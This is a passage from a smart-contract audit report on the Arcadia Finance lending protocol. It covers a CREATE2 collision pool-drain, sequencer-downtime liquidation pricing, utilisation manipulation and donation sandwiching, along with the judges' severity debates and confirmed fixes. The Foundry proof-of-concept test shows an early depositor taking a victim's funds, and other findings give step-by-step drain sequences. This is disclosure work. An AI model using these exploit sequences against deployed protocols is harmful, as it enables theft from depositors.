  • Repeat step 2 for as long as they need to (i.e. collateralize the same asset multiple times).
    • The account at 0xCOLLIDED is now infinitely collateralized.
    • Funds for step 2 and 3 can be obtained through external flash loan. Simply return the funds when this step is finished.
  • An infinitely collateralized account has infinite borrow power. Simply borrow all the funds from the lending pool and run away with it, leaving an infinity collateral account that actually holds no funds.

The attacker has stolen all funds from the lending pool.

Coded unit-PoC

While we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:

  • A contract can be deployed on top of an address that already had a contract before.
  • By deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.

Here is the PoC, as well as detailed steps to recreate it:

  1. Paste the following file onto Remix (or a developing environment of choice): https://gist.github.com/midori-fuse/087aa3248da114a0712757348fcce814
  2. Deploy the contract Test.
  3. Run the function Test.test() with a salt of your choice, and record the returned address. The result will be:
    • Test.getAllowance() for that address will return exactly APPROVE_AMOUNT.
    • Test.getCodeSize() for that address will return exactly zero.
    • This proves the second property.
  4. Using the same salt in step 3, run Test.test() again. The tx will go through, and the result will be:
    • Test.test() returns the same address as with the first run.
    • Test.getAllowance() for that address will return twice of APPROVE_AMOUNT.
    • Test.getCodeSize() for that address will still return zero.
    • This proves the first property.

The provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.

Impact

Complete draining of a lending pool if an address collision is found.

With the advancement of computing hardware, the cost of an attack has been shown to be just a few million dollars, and that the current Bitcoin network hashrate allows about $2^{80}$ in about half an hour. The cost of the attack may be offsetted with longer brute force time.

For a DeFi lending pool, it is normal for a pool TVL to reach tens or hundreds of millions in USD value (top protocols' TVL are well above the billions). It is then easy to show that such an attack is massively profitable.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol#L96-L100

Tool used

Manual Review, Remix IDE

Recommendation

The mitigation method is to prevent controlling over the deployed account address (or at least severely limit that). Some techniques may be:

  • Do not allow a user-supplied salt, as well as do not use the user address as a determining factor for the salt.
  • Use the vanilla contract creation with CREATE, as opposed to CREATE2. The contract's address is determined by msg.sender (the factory), and the internal nonce of the factory (for a contract, this is just "how many other contracts it has deployed" plus one).

This will prevent brute-forcing of one side of the collision, disabling the $O(2^{81})$ search technique.

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(5)

nevillehuang

Request PoC to facilitate discussion between sponsor and watson.

I believe this is low severity given the extreme unlikeliness of it occuring, with the addition that a insanely huge amount of funds is required to perform this attack without guarantee

sherlock-admin

PoC requested from @PUSH0

Requests remaining: 8

midori-fuse

Hello, thanks for asking.

The reason we believe this is a valid HM is the following:

  • The impact is undoubtedly high because a pool can be drained completely.
    • Although only one pool can be drained per collision found, that itself is high impact. Furthermore the protocol will be deployed on several EVM chains, so the attacker can simultaneously drain one pool per chain.
  • We are re-citing a past issue on Sherlock discussing the same root cause of CREATE2 collision, as the issue discussion sufficiently describes:
    • The attack cost at the time of the Kyber contest.
    • The probability of a successful attack was shown to increase to 86% using $2^{81}$ hashes, and 99.96% using twice that power. This is not a low probability by any chance.
      • Furthermore one may also find multiple collisions using this technique, which will allow draining of more than one pool.
  • Hardware advancements can only increase the computing power, not decrease it. Since the Kyber contest, BTC hashrate has already increased sigfinicantly (almost doubled), and it has been just 6 months since.
  • The more protocols with this issue there are, the more profit there is to finding a collision.

Therefore the likelihood of this attack can only increase as time passes. Complete draining of a pool also cannot be low severity.

Essentially by identifying this attack, we have proven the existence of a time bomb, that will allow complete draining of a certain pool from any given chain. We understand that past decisions are not considered a source of truth, however the issue discussion and the external resources should still provide an objective reference to determine this issue's validity. Furthermore let's consider the impact if it were to happen as well.

nevillehuang

@Czar102 I am interested in hearing your opinion here with regards to the previous issue here as well.

Thomas-Smets

Don't think it is a high, requires a very big upfront cost with no certainty on pay out as attacker. And while our factory is immutable, we can pause indefinitely the creation of new accounts.

If at some point the attack becomes a possibility, we can still block it.

To make it even harder, we are thinking to add the block.timestamp and block.number to the hash. Then the attacker, after they successfully found a hash collision, already has to execute the attack at a fixed block and probably conspire with the sequencer to ensure that also the time is fixed.

midori-fuse

Agree that it's not a high, the attack cost makes a strong external condition.

Re: mitigations. I don't think pausing the contract or blocking the attack makes sense, the attack would sort of finish in a flash before you know it (and in a shorter duration than a pausing multisig can react).

Regarding the fix, adding block.timestamp and block.number technically works, but doesn't really make sense as opposed to just using the vanilla creation. The main purpose of CREATE2 is that contract addresses are deterministic and pre-computable, you can do a handful of things with this information e.g. funds can be sent there in advance before contract creation, or crafting a customized address without deploying. By adding block number and timestamp, the purpose is essentially defeated.

But since it technically works, there's not really a point in opposing it I suppose. A full fix would involve reworking the account's accounting, which I think is quite complex and may open up more problems.

A fix that would still (partially, but should be sufficient) retain the mentioned functionalities could be just using a uint64 salt, or the last 64 bits of the address only, or anything that doesn't let the user determine more than 64 bits of the input. Then the other side of the brute force has to achieve $2^{15} = 32768$ times the mentioned hashing power in the attack to achieve a sizeable collision probability (and such probability is still less than a balanced $2^{80}$ brute force anyway).

Thomas-Smets

I don't think pausing the contract or blocking the attack makes sense

Meant it in the sense that if such an attack occurs we can pause it, assuming we would not be the first victim. Not that we can frontrun a particular attack with a pause.

Regarding the fix, adding block.timestamp and block.number technically works, but doesn't really make sense as opposed to just using the vanilla creation.

Fair point.

A fix that would still (partially, but should be sufficient) retain the mentioned functionalities could be just using a uint64 salt, or the last 64 bits of the address only, or anything that doesn't let the user determine more than 64 bits of the input.

I do like this idea thanks! We can use 32 bits from the tx.origin and 32 bits from a salt.

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#176.

IAm0x52

Fix looks good. By using a 32 bit salt the collision is increased from 2^81 to 2^128 dramatically increasing the cost.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-3: L2 sequencer down will push an auction's price down, causing unfair liquidation prices, and potentially guaranteeing bad debt

Source: #60

Found by

PUSH0, zzykxx

Summary

The protocol implements a L2 sequencer downtime check in the Registry. In the event of sequencer downtime (as well as a grace period following recovery), liquidations are disabled for the rightful reasons.

However, while the sequencer is down, any ongoing auctions' price decay is still ongoing. When the sequencer goes back online, it will be possible to liquidate for a much lower price, guaranteeing bad debt past a certain point.

Vulnerability Detail

While the price oracle has sequencer uptime checks, the liquidation auction's price curve calculation does not. The liquidation price is a function with respect to the user's total debt versus their total collateral.

Due to no sequencer check within the liquidator, the liquidation price continues to decay when the sequencer is down. It is possible for the liquidation price to drop below 100%, that is, it is then possible to liquidate all collateral without repaying all debt.

Any ongoing liquidations that are temporarily blocked by a sequencer outage will continue to experience price decay. When the sequencer goes back online, liquidation will have dropped significantly in price, causing liquidation to happen at an unfair price as well. Furthermore, longer downtime durations will make it possible to seize all collateral for less than $100\%$ debt, guaranteeing bad debt for the protocol.

Proof of concept

We use the default liquidator parameters defined in the constructor for our example:

  • Starting multiplier is 150%.
  • Final multiplier is 60%.
  • Half-life duration is 1 hour.
  • Cutoff time is irrelevant.

Consider the following scenario:

  1. Bob's account becomes liquidatable. Someone triggers liquidation start.
  2. Anyone can now buy $100\%$ of Bob's collateral for the price of $150\%$ of Bob's debt. However, this is not profitable yet, so everyone waits for the price to drop a bit more.
  3. After 30 minutes, auction price is now $60\% + 90\% * 0.5^{0.5} = 123.63\%$ of Bob's debt for $100\%$ collateral. Market price hasn't moved much, so this is still not profitable yet.
  4. Sequencer goes down for one hour, not counting grace period. Note that Arbitrum's sequencer has experienced multiple outages of this duration in the past. In 2022, there was an outage of approx. seven hours. There was also a 78-minute outage just December 2023.
  5. When the sequencer goes up, the auction has been going on for 1.5 hours, or 1.5 half-lives. Auction price is now $60\% + 90\% * 0.5^{1.5} = 91.82\%$.
  6. Liquidation is now profitable. All of Bob's collaterals are liquidated, but the buyer only has to repay $91.82\%$ of Bob's debt. Bob is left with $0$ collateral but positive debt (specifically, $8.18\%$ of his original debt).

The impact becomes more severe the longer the sequencer goes down. In addition, the grace period on top of it will decay the auction price even further, before the auction can be back online.

  • In the above scenario, if the sequencer outage plus grace period is $2$ hours, then the repaid debt percentage is only $60\% + 90\% * 0.5^{2.5} = 75.91\%$

Furthermore, even if downtime is not enough to bring down the multiplier to less than $100\%$, Bob will still incur unfair loss due to his collateral being sold at a lower price anyway. Therefore any duration of sequencer downtime will cause an unfair loss.

Impact

Any ongoing liquidations during a sequencer outage event will execute at a lower debt-to-collateral ratio, potentially guaranteeing bad debt and/or user being liquidated for a lower price.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/Liquidator.sol#L364-L395

Tool used

Manual Review

Recommendation

Auctions' price curve should either check and exclude sequencer downtime alongside its grace period, or said auctions should simply be voided.

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid

nevillehuang

Since it was mentioned in the contest details as the following, I believe the exception highlighted in point 20. of sherlock rules applies here, so leaving as medium severity.

Chainlink and contracts of primary assets are TRUSTED, others are RESTRICTED

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#136.

IAm0x52

Fix looks good. Bids made during sequencer downtime revert and all auctions automatically refresh auction starting time.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-4: Utilisation Can Be Manipulated Far Above 100%

Source: #93

Found by

Bandit, zzykxx

Summary

The utilisation of the protocol can be manipulated far above 100% via token donation. It is easiest to set this up on an empty pool. This can be used to manipulate the interest to above 10000% per minute to steal from future depositors.

Vulnerability Detail

This attack is inspired by / taken from this bug report for Silo Finance. I recommend reading it as is very well written: https://medium.com/immunefi/silo-finance-logic-error-bugfix-review-35de29bd934a

The utilisation is basically assets_borrowed / assets_loaned. A higher utilisation creates a higher interest rate. This is assumed to be less than 100%. However if it exceeds 100%, there is no cap here:

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L809-L817

Normally, assets borrowed should never exceed assets loaned, however this is possible in Arcadia as the only thing stopping a borrow exceeding loans is that the transfer of tokens will revert due to not enough tokens in the Lending pool. However, an attacker can make it not revert by simply sending tokens directly into the lending pool. For example using the following sequence:

  1. deposit 100 assets into tranche
  2. Use ERC20 Transfer to transfer 1e18 assets into the LendingPool
  3. Borrow the 1e18 assets

These are the first steps of the coded POC at the bottom of this issue. It uses a token donation to make a borrow which is far larger than the loan amount.

In the utilisation calculation, this results in a incredibly high utilisation rate and thus interest rate as it is not capped at 100%. This is why some protocols implement a hardcap of utilisation at 100%.

The interest rate is so high that over 2 minutes, 100 assets grows to over100000 assets, or a 100000% interest over 2 minutes. The linked similar exploit on Silo Finance has an even more drastic interest manipulation which could drain the whole protocol in a block. However I did not optimise the numbers for this POC.

Note that the 1e18 assets "donated" to the protocol are not lost. They can simply be all borrowed into an attackers account.

The attacker can set this up when the initial lending pool is empty. Then, they can steal assets from subsequent depositors due to the huge amount of interest collected from their small initial deposit

Let me sum up the attack in the POC:

  1. deposit 100 assets into tranche
  2. Use ERC20 Transfer to transfer 1e18 assets into the LendingPool
  3. Borrow the 1e18 assets
  4. Victim deposits into tranche
  5. Attacker withdraws the victims funds which is greater than the 100 assets the attacker initially deposited

Here is the output from the console.logs:

Running 1 test for test/scenario/BorrowAndRepay.scenario.t.sol:BorrowAndRepay_Scenario_Test
[PASS] testScenario_Poc() (gas: 799155)
Logs:
  100 initial pool balance. This is also the amount deposited into tranche
  warp 2 minutes into future
  mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack
  22 shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!

This is the edited version of setUp() in _scenario.t.sol

function setUp() public virtual override(Fuzz_Lending_Test) {
        Fuzz_Lending_Test.setUp();
        deployArcadiaLendingWithAccounts();

        vm.prank(users.creatorAddress);
        pool.addTranche(address(tranche), 50);

        // Deposit funds in the pool.
        deal(address(mockERC20.stable1), users.liquidityProvider, type(uint128).max, true);

        vm.startPrank(users.liquidityProvider);
        mockERC20.stable1.approve(address(pool), 100);
        //only 1 asset was minted to the liquidity provider
        tranche.mint(100, users.liquidityProvider);
        vm.stopPrank();

        vm.startPrank(users.creatorAddress);
        pool.setAccountVersion(1, true);
        pool.setInterestParameters(
            Constants.interestRate, Constants.interestRate, Constants.interestRate, Constants.utilisationThreshold
        );
        vm.stopPrank();

        vm.prank(users.accountOwner);
        proxyAccount.openMarginAccount(address(pool));
    }

This test was added to BorrowAndRepay.scenario.t.sol

    function testScenario_Poc() public {

        uint poolBalance = mockERC20.stable1.balanceOf(address(pool));
        console.log(poolBalance, "initial pool balance. This is also the amount deposited into tranche");
        vm.startPrank(users.liquidityProvider);
        mockERC20.stable1.approve(address(pool), 1e18);
        mockERC20.stable1.transfer(address(pool),1e18);
        vm.stopPrank();

        // Given: collateralValue is smaller than maxExposure.
        //amount token up to max
        uint112 amountToken = 1e30;
        uint128 amountCredit = 1e10;

        //get the collateral factor
        uint16 collFactor_ = Constants.tokenToStableCollFactor;
        uint256 valueOfOneToken = (Constants.WAD * rates.token1ToUsd) / 10 ** Constants.tokenOracleDecimals;

        //deposits token1 into proxyAccount
        depositTokenInAccount(proxyAccount, mockERC20.token1, amountToken);

        uint256 maxCredit = (
            //amount credit is capped based on amount Token
            (valueOfOneToken * amountToken) / 10 ** Constants.tokenDecimals * collFactor_ / AssetValuationLib.ONE_4
                / 10 ** (18 - Constants.stableDecimals)
        );


        vm.startPrank(users.accountOwner);
        //borrow the amountCredit to the proxy account
        pool.borrow(amountCredit, address(proxyAccount), users.accountOwner, emptyBytes3);
        vm.stopPrank();

        assertEq(mockERC20.stable1.balanceOf(users.accountOwner), amountCredit);

        //warp 2 minutes into the future.
        vm.roll(block.number + 10);
        vm.warp(block.timestamp + 120);

        console.log("warp 2 minutes into future");

        address victim = address(123);
        deal(address(mockERC20.stable1), victim, type(uint128).max, true);

        vm.startPrank(victim);
        mockERC20.stable1.approve(address(pool), type(uint128).max);
        uint shares = tranche.mint(1e3, victim);
        vm.stopPrank();

        console.log("mint was used rather than deposit to ensure no rounding error. This a UTILISATION manipulation attack not a share inflation attack");

        //function withdraw(uint256 assets, address receiver, address owner_)

        //WITHDRAWN 1e5
        vm.startPrank(users.liquidityProvider);
        uint withdrawShares = tranche.withdraw(1e5, users.liquidityProvider,users.liquidityProvider);
        vm.stopPrank();

        console.log(withdrawShares, "shares were burned in exchange for 100000 assets. Users.LiquidityProvider only deposited 100 asset in the tranche but withdrew 100000 assets!");


    }

Impact

An early depositor can steal funds from future depositors through utilisation/interest rate manipulation.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L809-L817

Tool used

Manual Review

Recommendation

Add a utilisation cap of 100%. Many other lending protocols implement this mitigation.

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: utilization should be mitigated; high(6)

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#137.

sherlock-admin2

This should be high as it can steal both the first subsequent deposit and all future deposits after that. The original linked issue for Silo Finance was Critical although Silo had multiple simultaneous pools. The interest rate formula for both Silo and Arcadia are the same, but that POC was more optimised which shows a faster rate of massive interest accrual.

You've deleted an escalation for this issue.

nevillehuang

Hi @Banditx0x I believe the following factors mentioned by @zzykxx in his report warrants the decrease in severity:

  • The interest rate is capped at 2^80 (~= 10^24) because of the downcasting in LendingPool::_calculateInterestRate(). The maximum interest is about 100% every 20 days.
  • The tokens sent directly to the pool by the griefer are effectively lost and can be transferred to the treasury.
  • The virtual shares implementation in the tranches might prevent the attacker from collecting all of the interest.

Sponsors Comments:

impact is only possible in quasi empty pools, and cost for doing it is largely in line with the damage done. In the example of 93, only 100 assets are in the pool, 1e18 are donated by the attacker → only the user borrowing the 100 assets is affected, so in this case of an empty pool, not a lot, and even more, the 1e18 can indeed be borrowed by the attacker, but he’ll be liquidated and incur a loss himself: he is the one paying the interest he jacked up (even if only >100 is recovered through liquidations, the LP actually profits, since the penalty is paid on a larger amount than what the “good” lp borrowed out). → low probability, cost is high → medium at most

zzykxx

Hey @Banditx0x, correct me if I'm wrong, but I think the following applies here:

  • In the Silo finance exploit depositing assets in a pool allowed to use the shares of the said pool to borrow other assets. An attacker could deposit a small amount, borrow his own donation (increasing the utilization rate), which had the effect of increasing the value of his initial donation. Then he could use the initial donation, which is now extremely overvalued, as collateral to borrow assets and steal funds. This is not possible here because the shares of a lending pool cannot be used as collateral to borrow assets.
  • Unlike the Silo finance case, the maximum interest rate achievable is capped at uint80 =~ 10^24.
  • To steal a sensible amount of funds the attacker should first deposit more than "100" assets. But by depositing more than "100" assets the required amount to donate to achieve maximum utilization manipulation also increases. You could argue this is not the case and more time just needs to pass, but if anybody in the meantime deposits extra funds in the tranche and/or calls updateInterestRate() the interest rate will diminish the speed at which it increases.
  • The attacker, which as you said can borrow his own donation, also has to pay interest on it.
  • In your POC the virtual shares are not taken into account. As we know virtual shares cause a loss to the first depositor, this depends on the amount of decimals and the value of the underlying and also by how much the virtual share is set at.

Some damage can be caused by abusing this issue, but I think the damage is not big enough to classify this as high severity. Of course, I would be more than happy to be proven wrong since this would also be in my personal interest.

Banditx0x

@zzykxx thanks for the response. You're right that the Silo finance situation had much higher impact due to manipulation of one asset allowing borrows of another. However I had originally thought that the impact would be High even with this in mind as it had the same impact as the share inflation attack which historically has had high severity.

I hadn't realised the maximum interest rate was capped at uint80, which indeed caps the interest rate to far lower than the issue I had linked.

Given the slower interest rate accrual than I originally thought, I agree with the medium severity.

Edit: i deleted past escalation comment due to this discussion. Just so this conversation makes sense for future readers.

Czar102

Planning to reject the escalation and leave the issue as is.

Czar102

Result: Medium Has duplicates

midori-fuse

Wasn't the escalation deleted before the period end?

Banditx0x's comment was last edited on 5:26AM UTC, while the escalation period end was 12:36PM same day.

Czar102

@midori-fuse It looks so, we will look into it. Thank you for bringing this up!

Czar102

The escalation should have been deleted, there was an issue on Sherlock's part that's now resolved.

IAm0x52

Fix looks good. Utilization is now capped at 100%

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-5: Dilution of Donations in Tranche

Source: #121

The protocol has acknowledged this issue.

Found by

Atharv, erosjohn, pash0k

Summary

In this attack, the attacker takes advantage of the non-atomic nature of the donation and the share valuation process. By strategically placing deposit and withdrawal transactions around the donation transaction, the attacker can temporarily inflate their share of the pool to capture a large portion of the donated funds, which they then quickly exit with, leaving the pool with their original investment plus extra value extracted from the donation.

Vulnerability Detail

Though there is no reasonable flow where users will just 'donate' assets to others, Risk Manager may needs to call donateToTranche to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoff time or in case of bad debt.

donateToTranche function of a lending pool smart contract, allows for a sandwich attack that can be exploited by a malicious actor to dilute the impact of donations made to a specific tranche. This attack involves front-running a detected donation transaction with a large deposit and following it up with an immediate withdrawal after the donation is processed.

The lending pool contract in question allows liquidity providers (LPs) to deposit funds into tranches, which represent slices of the pool's capital with varying risk profiles. The donateToTranche function permits external parties to donate assets to a tranche, thereby increasing the value of the tranche's shares and benefiting all LPs proportionally. Transactions can be observed by one of the LP's before they are mined. An attacker can exploit this by identifying a pending donation transaction and executing a sandwich attack. This attack results in the dilution of the donation's intended effect, as the attacker's actions siphon off a portion of the donated funds.

Impact

Dilution of Donation: The intended impact of the donation on the original LPs is diluted as the attacker siphons off a portion of the donated funds.

Steps to Reproduce Issue

  1. Front-Running: The attacker deposits a significant amount of assets into the target tranche before the donation transaction is confirmed, temporarily increasing their share of the tranche.

  2. Donation Processing: The original donation transaction is processed, increasing the value of the tranche's shares, including those recently acquired by the attacker.

  3. Back-Running: The attacker immediately withdraws their total balance from the tranche, which now includes a portion of the donated assets, effectively extracting value from the donation meant for the original LPs.

Code Snippet

Code Snippet

Coded PoC

https://github.com/Atharv181/Arcadia-POC
- git clone https://github.com/Atharv181/Arcadia-POC
- cd Arcadia-POC
- forge install
- forge test --mt test_PoC -vvv

Tool used

Manual Review, Foundry

Recommendation

  • Snapshot Mechanism: Take snapshots of share ownership at random intervals and distribute donations based on the snapshot to prevent exploitation.
  • Timelocks: Implement a timelock mechanism that requires funds to be locked for a certain period before they can be withdrawn.

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid

nevillehuang

Low severity, A combination of Front and Back running not possible on Base, Optimism and Arbitrum due to private sequencers. Other chains were not explicitly mentioned, or at least all the issues and the duplicates do not present a possible chain where a sandwich attack is possible.

zzykxx

Escalate

I'm escalating this on behalf of @pa-sh0k because I believe his claims should be considered via a proper escalation. This is what he states:

The loss of funds can be caused not only if the attacker executes an atomic sandwich attack, but also if they do the following steps:

  1. backrun the liquidation that ended up in transferring collateral to the admin, since this always leads to the donateToTranche call, and then deposit to the tranche
  2. backrun the donation itself and redeem their shares, obtaining profit

Hence, the reason for invalidation is incorrect.

Also, the sponsor has acknowledged the issue in discord channel.

By Sherlock’s rules, this issue is a medium, it suits the following criteria: “Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The losses must exceed small, finite amount of funds, and any amount relevant based on the precision or significance of the loss”.

sherlock-admin2

Escalate

I'm escalating this on behalf of @pa-sh0k because I believe his claims should be considered via a proper escalation. This is what he states:

The loss of funds can be caused not only if the attacker executes an atomic sandwich attack, but also if they do the following steps:

  1. backrun the liquidation that ended up in transferring collateral to the admin, since this always leads to the donateToTranche call, and then deposit to the tranche
  2. backrun the donation itself and redeem their shares, obtaining profit

Hence, the reason for invalidation is incorrect.

Also, the sponsor has acknowledged the issue in discord channel.

By Sherlock’s rules, this issue is a medium, it suits the following criteria: “Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The losses must exceed small, finite amount of funds, and any amount relevant based on the precision or significance of the loss”.

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

Thomas-Smets

If such a backrun would happen, the admin would just not donate via donateToTranche.

The auction proceeds would in this case donated via different means (it is already the unhappy flow of an unhappy flow where things have to be handled manually). A bit annoying, but no loss of user funds.

So the attacker has the risk that they have to provide liquidty in the Tranche for un unknown amount of time, without any certainty of profits at all.

pa-sh0k

Detecting the backrun and getting the funds back to the depositors via different means is indeed a solution to the problem. However, it does not make the problem itself invalid or non-existent: there may be different solutions and all of them, of course, should lead to no loss of user funds.

The issue still exists and it can be prevented using the described method only if it was known beforehand, but it was not stated in the known issues or anywhere else.

I have said this in the discord channel, but since the conversation was moved here, I will add a quote so anyone can understand the context:

private sequencer doesn't have anything to do with this issue, this can be done in separate blocks and with backruns, check my comment on this issue: #128 So, the attack has the following scenario:

  • a liquidation results in unhappy flow with unsold collateral
  • collateral is sent to the admin
  • in the next block (or a bit later), once the attacker sees this onchain, attacker deposits funds to the junior tranche
  • during period of length T admin manually sells the collateral
  • admin donates the funds to the junior tranche
  • in next block (or a bit later), once the attacker sees this onchain, attacker redeems their shares

This results in gains for the attacker and losses for the original depositors, since they got less funds that they should have after the liquidation was manually resolved

Also, wanted to state that my issue, #128 , is a duplicate of this one and everything said in this discussion is applicable to it and vice versa.

Thomas-Smets

I want to state again that donateToTranche is never enforced by the protocol in any means. It is a function that can but not must be used in the case a manual liquidation is triggered.

Normally if the protocol functions as expected, auctions terminate automatically.

We however foresaw a flow that if for some reason an auction would not end (this already means things did not work out as expected), a trusted user (set by the Creditor) can manually liquidate the assets.

After the assets are liquidated he can choose if and how to distribute the assets to potentially impacted users. The donateToTranche is a function that might help in this process but the protocol obliges nobody to use it. It is not part of the core functionality. It is a function to help in an already manual unhappy flow of a unhappy flow.

There are no guaranteed losses for LPs, and attackers have no guaranteed way to make profits, but have to put significant amounts of capital at stake.

Note on the recommendations:

Snapshot Mechanism: Take snapshots of share ownership at random intervals and distribute donations based on the snapshot to prevent exploitation.

Snapshots are not mutually exclusive from donateToTranche. We are in a manual trusted flow. If the manual liquidator could liquidate remaining assets before new people deposit in the Tranche he can use donateToTranche. If not they can use a snapshot and distribute funds.

Timelocks: Implement a timelock mechanism that requires funds to be locked for a certain period before they can be withdrawn.

This creates new issues and risks since the the locking mechanisms of Tranches are already complex.

pa-sh0k

Before this issue was submitted, escalated and this discussion was started, it was not stated anywhere, that backrunning activity will be monitored and if something malicious is noticed, other ways of liquidation settling will be used.

If you have known about such attack vector and already had other ways of handling it, it should have been stated in the known issues.

Thomas-Smets

It is a trusted manual flow executed by a permissioned role! And that is clearly stated in the code

nevillehuang

Agree with sponsor comments here, this issue should remain low severity.

pa-sh0k

The fact that it is executed by a permissioned role is already assumed in the issue. The issue is that when trusted manual flow is executed by a permissioned role using donateToTranche, users' funds can be stolen.

What is stated in the code (LendingPool.sol#L346-L347) about donateToTranche is the following:

It is supposed to serve as a way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime.

From this comment it cannot be concluded that backrunning will be monitored and if something malicious is noticed, other ways of liquidation settling will be used.

The fact that this flow is executed by a permissioned role does not make it invincible.

What was stated previously:

I do acknowledge it exists, but we consider it a low, since pay-out for attackers is uncertain and as you said, it can be prevented if an attacker really tries to pull it of.

Obviously, this issue can't be prevented it is not known about by the admin. Since it was submitted, which is my job as a Watson, now the admins know about it and can prevent the loss of funds.

Addressing the Sherlock's criteria:

“Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The losses must exceed small, finite amount of funds, and any amount relevant based on the precision or significance of the loss”.

This issue requires certain external conditions and causes loss of funds if these conditions are met.

Regarding the following words of the sponsor:

attackers have no guaranteed way to make profits, but have to put significant amounts of capital at stake

Attacker is guaranteed to make profits if the conditions are met. Also, probability of depositing funds into the protocol as a liquidity provider for a short period of time, which the attacker would have to do, has near-to-zero risk of losing money. They would probably even make money by providing liquidity.

Thomas-Smets

From this comment it cannot be concluded that backrunning will be monitored and if something malicious is noticed, other ways of liquidation settling will be used.

As we say in the comment:

It is supposed to serve as a way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime.

not

It is supposed to serve as the way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime.

Addressing the Sherlock's criteria:

We even state that this flow is not enforced by the smart contracts: https://github.com/arcadia-finance/lending-v2/blob/dcc682742949d56928e7e8e281839d2229bd9737/src/Liquidator.sol#L431

pa-sh0k

"Not enforced by the smart contracts" is equal to "it is manual", which is already assumed in the issue.

The issue is invalid if donateToTranche is never used for refunding the users. The comments imply that at some point it will be used for it, so, once it is used, the mentioned conditions are met and loss of funds is caused.

The argument that if admin wants to use donateToTranche but sees that an attacker made a large deposit trying to frontrun the call and then will decide to use other way of refunding is not applicable here, as before this issue was submitted, the need for monitoring and preventing such attack was not known.

If other way of refunding is chosen for some other reasons, the attacker can simply withdraw their funds at no loss.

Atharv181

Talking about the severity the identified vulnerability clearly meets the criteria for a medium severity issue. It results in a loss of funds, as highlighted by the Dilution of Donations, which directly impacts the intended recipients of those funds. While the exploit may require certain external conditions or specific states to occur, the potential for loss is significant and cannot be dismissed lightly.

The fact that the vulnerability exists and can lead to tangible financial harm underscores its severity. Even though the losses may not be immediate or guaranteed, they exceed a small, finite amount of funds, especially when considering the significance of the loss to affected lenders.

Thomas-Smets

Let's not use chatGPT when discussing the findings.

erosjohn

I would like to add that even if there is no attacker, this will harm other users' profits. As long as a new user deposits assets into jrTranche after _settleAuction() is called, when donateToTranche() is called later to compensate the jrTranche, the profit of the original user will be diluted. Obviously, the operation of a new user depositing assets into tranche will happen at any time, and as long as the protocol is not checked, you have no way to avoid it.

Czar102

The protocol will later "donate" these proceeds back to the impacted Tranches

It seems that the donation was to be to Tranches, not to Tranches' holders at the time of the auction/auction failure. This itself is a logical issue that should be recognized as the core issue here.

I think most doubts regarding the validity of this issue come from the fact that modifying the planned usage of the functionality solves this issue. I don't think this means that an issue is invalid.

If I am mistaken and there is other clear evidence that the donation was to be done to holders at the time the auctioned assets were subtracted from a tranche's balance, I will agree with invalidation. Right now, the sponsor's arguments seem to be that this the comments were suggesting a route for next steps, and these steps could be different. Without mentioning the mint monitoring checks, this seems to be equivalent to an approach that "in a manual action, we would notice this issue", while assuming that the issue will be found anyway doesn't invalidate its existence. @nevillehuang @Thomas-Smets do my points make sense?

nevillehuang

@Czar102 This issue is definitely possible, however, donateToTranche() is not a core functionality of the protocol, as it is solely used for manual liquidations to allow the manual liquidator to possibly serve as a way to compensate junior tranches. I suggest relooking at the sponsor comments here and here

pa-sh0k

@nevillehuang why "not a core functionality" is used as an argument for issue's invalidity? It is definitely in scope and is a part of the protocol

Thomas-Smets

@nevillehuang why "not a core functionality" is used as an argument for issue's invalidity? It is definitely in scope and is a part of the protocol

The function is never called from a function within the protocol. It is always a someone from outside the protocol that must call the function. An attacker is never certain the function will be called, they cannot enforce it in any way possible.

If you read my comments above I am not denying it is an issue, I stated that since there is no guarantee on profit and it can even be avoided there is ever profit for an attacker, I consider it a low issue.

Czar102

Is there an expectation of a donation of nonzero proceeds in the unhappy flow? Or are positive proceeds not expected? @Thomas-Smets

Atharv181

I would like to add that even if there is no attacker, this will harm other users' profits. As long as a new user deposits assets into jrTranche after _settleAuction() is called, when donateToTranche() is called later to compensate the jrTranche, the profit of the original user will be diluted.

Also dilutes the donations for users.

Atharv181

image

It is clearly mentioned here that it is used to compensate the tranche after an auction didn't get sold (unhappy flow)

Thomas-Smets

My point of view: it is a low issue I feel discussing it more is not that useful since we are just in a yes-no discussion.

We are talking about an emergency situation where the protocol already didn't function as expected and that has to be resolved 100% manually. And in no way is donateToTranche() enforced to be called, if it can be called it makes things easier, if not it can still be resolved 100% without losses to users.

  1. It should never occur in the first place (low probability)
